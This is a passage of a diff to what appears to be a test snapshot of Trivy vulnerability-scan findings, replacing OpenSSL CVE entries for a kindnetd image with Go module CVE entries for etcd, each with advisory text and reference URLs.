SM2 Decryption Buffer Overflow", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3711", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/26/2", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3711", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3711", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=59f5e75f3bced8fc0e130d72a3f582cf7b480b46", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-5ww6-px42-wc85", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3711", + "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0097.html", + "value": "https://errata.rockylinux.org/RLSA-2022:7129", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-02", + "value": "https://github.com/advisories/GHSA-69cg-p879-7622", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-02", + "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210827-0010/", + "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211022-0003/", + "value": "https://github.com/golang/go/issues/54658", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5051-1", + "value": "https://go.dev/cl/428735", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3711", + "value": "https://go.dev/issue/54658", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4963", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20210824.txt", + "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2022.html", + "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-16", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2022-02", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + }, + { + "type": "URL", + "value": "https://pkg.go.dev/vuln/GO-2022-0969", + }, + { + "type": "URL", + "value": "https://security.gentoo.org/glsa/202209-26", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-6038-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1292", - "installedVersion": "1.1.1d-0+deb10u4", - "packageName": "libssl1.1", + "fixedVersion": "0.7.0", + "foundIn": "Target: 'usr/local/bin/etcd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41723", + "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", + "packageName": "golang.org/x/net", "references": [ - "https://access.redhat.com/errata/RHSA-2022:6224", - "https://access.redhat.com/security/cve/CVE-2022-1292", - "https://bugzilla.redhat.com/2081494", - "https://bugzilla.redhat.com/2087911", - "https://bugzilla.redhat.com/2087913", - "https://bugzilla.redhat.com/2097310", - "https://bugzilla.redhat.com/2104905", - "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", - "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", - "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", - "https://cert-portal.siemens.com/productcert/pdf/ssa-953464.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", - "https://errata.almalinux.org/9/ALSA-2022-6224.html", - "https://errata.rockylinux.org/RLSA-2022:5818", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1ad73b4d27bd8c1b369a3cd453681d3a4f1bb9b2", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=548d3f280a6e737673f5b61fce24bb100108dfeb", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e5fd1728ef4c7a5bf7c7a7163ca60370460a6e23", - "https://linux.oracle.com/cve/CVE-2022-1292.html", - "https://linux.oracle.com/errata/ELSA-2022-9751.html", - "https://lists.debian.org/debian-lts-announce/2022/05/msg00019.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VX4KWHPMKYJL6ZLW4M5IU7E5UV5ZWJQU/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZNU5M7BXMML26G3GPYKFGQYPQDRSNKDD/", - "https://mta.openssl.org/pipermail/openssl-announce/2022-May/000224.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1292", - "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0011", - "https://security.gentoo.org/glsa/202210-02", - "https://security.netapp.com/advisory/ntap-20220602-0009/", - "https://security.netapp.com/advisory/ntap-20220729-0004/", - "https://ubuntu.com/security/notices/USN-5402-1", - "https://ubuntu.com/security/notices/USN-5402-2", - "https://www.cve.org/CVERecord?id=CVE-2022-1292", - "https://www.debian.org/security/2022/dsa-5139", - "https://www.openssl.org/news/secadv/20220503.txt", - "https://www.oracle.com/security-alerts/cpujul2022.html", + "https://access.redhat.com/security/cve/CVE-2022-41723", + "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", + "https://go.dev/cl/468135", + "https://go.dev/cl/468295", + "https://go.dev/issue/57855", + "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "https://pkg.go.dev/vuln/GO-2023-1571", + "https://vuln.go.dev/ID/GO-2023-1571.json", + "https://www.cve.org/CVERecord?id=CVE-2022-41723", ], }, "category": "Vulnerability", - "description": "The c_rehash script does not properly sanitise shell metacharacters to prevent command injection. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.3 (Affected 3.0.0,3.0.1,3.0.2). Fixed in OpenSSL 1.1.1o (Affected 1.1.1-1.1.1n). Fixed in OpenSSL 1.0.2ze (Affected 1.0.2-1.0.2zd).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", "mitigation": undefined, - "name": "c_rehash script allows command injection", + "name": "avoid quadratic complexity in HPACK decoding", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1292", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:6224", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-1292", + "value": "https://avd.aquasec.com/nvd/cve-2022-41723", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2081494", + "value": "https://access.redhat.com/security/cve/CVE-2022-41723", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2087911", + "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2087913", + "value": "https://go.dev/cl/468135", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2097310", + "value": "https://go.dev/cl/468295", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2104905", + "value": "https://go.dev/issue/57855", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", + "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-953464.pdf", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + "value": "https://pkg.go.dev/vuln/GO-2023-1571", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + "value": "https://vuln.go.dev/ID/GO-2023-1571.json", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-6224.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "0.4.0", + "foundIn": "Target: 'usr/local/bin/etcd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41717", + "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", + "packageName": "golang.org/x/net", + "references": [ + "https://access.redhat.com/errata/RHSA-2023:2367", + "https://access.redhat.com/security/cve/CVE-2022-41717", + "https://bugzilla.redhat.com/2092793", + "https://bugzilla.redhat.com/2161274", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "https://go.dev/cl/455635", + "https://go.dev/cl/455717", + "https://go.dev/issue/56350", + "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "https://linux.oracle.com/cve/CVE-2022-41717.html", + "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "https://pkg.go.dev/vuln/GO-2022-1144", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-41717", + ], + }, + "category": "Vulnerability", + "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": undefined, + "name": "excessive memory growth in a Go server accepting HTTP/2 requests", + "references": [ { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:5818", + "value": "https://avd.aquasec.com/nvd/cve-2022-41717", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1ad73b4d27bd8c1b369a3cd453681d3a4f1bb9b2", + "value": "https://access.redhat.com/errata/RHSA-2023:2367", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=548d3f280a6e737673f5b61fce24bb100108dfeb", + "value": "https://access.redhat.com/security/cve/CVE-2022-41717", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e5fd1728ef4c7a5bf7c7a7163ca60370460a6e23", + "value": "https://bugzilla.redhat.com/2092793", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-1292.html", + "value": "https://bugzilla.redhat.com/2161274", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9751.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00019.html", + "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VX4KWHPMKYJL6ZLW4M5IU7E5UV5ZWJQU/", + "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZNU5M7BXMML26G3GPYKFGQYPQDRSNKDD/", + "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", }, { "type": "URL", - "value": "https://mta.openssl.org/pipermail/openssl-announce/2022-May/000224.html", + "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1292", + "value": "https://go.dev/cl/455635", }, { "type": "URL", - "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0011", + "value": "https://go.dev/cl/455717", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-02", + "value": "https://go.dev/issue/56350", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220602-0009/", + "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220729-0004/", + "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5402-1", + "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5402-2", + "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-1292", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5139", + "value": "https://pkg.go.dev/vuln/GO-2022-1144", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20220503.txt", + "value": "https://ubuntu.com/security/notices/USN-6038-1", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb10u3", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-2068", - "installedVersion": "1.1.1d-0+deb10u4", - "packageName": "libssl1.1", + "fixedVersion": "0.0.0-20220412211240-33da011f77ad", + "foundIn": "Target: 'usr/local/bin/etcd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-29526", + "installedVersion": "v0.0.0-20210615035016-665e8c7367d1", + "packageName": "golang.org/x/sys", "references": [ - "https://access.redhat.com/errata/RHSA-2022:6224", - "https://access.redhat.com/security/cve/CVE-2022-2068", - "https://bugzilla.redhat.com/2081494", - "https://bugzilla.redhat.com/2087911", - "https://bugzilla.redhat.com/2087913", - "https://bugzilla.redhat.com/2097310", - "https://bugzilla.redhat.com/2104905", - "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", - "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", - "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", - "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", - "https://errata.almalinux.org/9/ALSA-2022-6224.html", - "https://errata.rockylinux.org/RLSA-2022:5818", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c9c35870601b4a44d86ddbf512b38df38285cfa", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=7a9c027159fe9e1bbc2cd38a8a2914bff0d5abd9", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9639817dac8bbbaa64d09efad7464ccc405527c7", - "https://linux.oracle.com/cve/CVE-2022-2068.html", - "https://linux.oracle.com/errata/ELSA-2022-9751.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6WZZBKUHQFGSKGNXXKICSRPL7AMVW5M5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-2068", - "https://security.netapp.com/advisory/ntap-20220707-0008/", - "https://ubuntu.com/security/notices/USN-5488-1", - "https://ubuntu.com/security/notices/USN-5488-2", - "https://www.cve.org/CVERecord?id=CVE-2022-2068", - "https://www.debian.org/security/2022/dsa-5169", - "https://www.openssl.org/news/secadv/20220621.txt", + "https://access.redhat.com/security/cve/CVE-2022-29526", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", + "https://github.com/advisories/GHSA-p782-xgp4-8hr8", + "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", + "https://github.com/golang/go/issues/52313", + "https://go.dev/cl/399539", + "https://go.dev/cl/400074", + "https://go.dev/issue/52313", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", + "https://linux.oracle.com/cve/CVE-2022-29526.html", + "https://linux.oracle.com/errata/ELSA-2022-5337.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", + "https://pkg.go.dev/vuln/GO-2022-0493", + "https://security.gentoo.org/glsa/202208-02", + "https://security.netapp.com/advisory/ntap-20220729-0001/", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-29526", ], }, "category": "Vulnerability", - "description": "In addition to the c_rehash shell command injection identified in CVE-2022-1292, further circumstances where the c_rehash script does not properly sanitise shell metacharacters to prevent command injection were found by code review. When the CVE-2022-1292 was fixed it was not discovered that there are other places in the script where the file names of certificates being hashed were possibly passed to a command executed through the shell. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.4 (Affected 3.0.0,3.0.1,3.0.2,3.0.3). Fixed in OpenSSL 1.1.1p (Affected 1.1.1-1.1.1o). Fixed in OpenSSL 1.0.2zf (Affected 1.0.2-1.0.2ze).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "Go before 1.17.10 and 1.18.x before 1.18.2 has Incorrect Privilege Assignment. When called with a non-zero flags parameter, the Faccessat function could incorrectly report that a file is accessible.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", "mitigation": undefined, - "name": "the c_rehash script allows command injection", + "name": "faccessat checks wrong group", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-2068", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:6224", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-2068", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2081494", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2087911", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2087913", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2097310", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2104905", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", + "value": "https://avd.aquasec.com/nvd/cve-2022-29526", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", + "value": "https://access.redhat.com/security/cve/CVE-2022-29526", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", + "value": "https://github.com/advisories/GHSA-p782-xgp4-8hr8", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + "value": "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + "value": "https://github.com/golang/go/issues/52313", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + "value": "https://go.dev/cl/399539", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-6224.html", + "value": "https://go.dev/cl/400074", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:5818", + "value": "https://go.dev/issue/52313", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c9c35870601b4a44d86ddbf512b38df38285cfa", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=7a9c027159fe9e1bbc2cd38a8a2914bff0d5abd9", + "value": "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9639817dac8bbbaa64d09efad7464ccc405527c7", + "value": "https://linux.oracle.com/cve/CVE-2022-29526.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-2068.html", + "value": "https://linux.oracle.com/errata/ELSA-2022-5337.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9751.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6WZZBKUHQFGSKGNXXKICSRPL7AMVW5M5/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2068", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220707-0008/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5488-1", + "value": "https://pkg.go.dev/vuln/GO-2022-0493", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5488-2", + "value": "https://security.gentoo.org/glsa/202208-02", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-2068", + "value": "https://security.netapp.com/advisory/ntap-20220729-0001/", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5169", + "value": "https://ubuntu.com/security/notices/USN-6038-1", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20220621.txt", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-29526", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "1.1.1d-0+deb10u5", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-23840", - "installedVersion": "1.1.1d-0+deb10u4", - "packageName": "libssl1.1", + "fixedVersion": "0.3.7", + "foundIn": "Target: 'usr/local/bin/etcd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2021-38561", + "installedVersion": "v0.3.6", + "packageName": "golang.org/x/text", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-23840", - "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23840", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2", - "https://github.com/advisories/GHSA-qgm6-9472-pwq7", - "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", - "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", - "https://linux.oracle.com/cve/CVE-2021-23840.html", - "https://linux.oracle.com/errata/ELSA-2021-9561.html", - "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", - 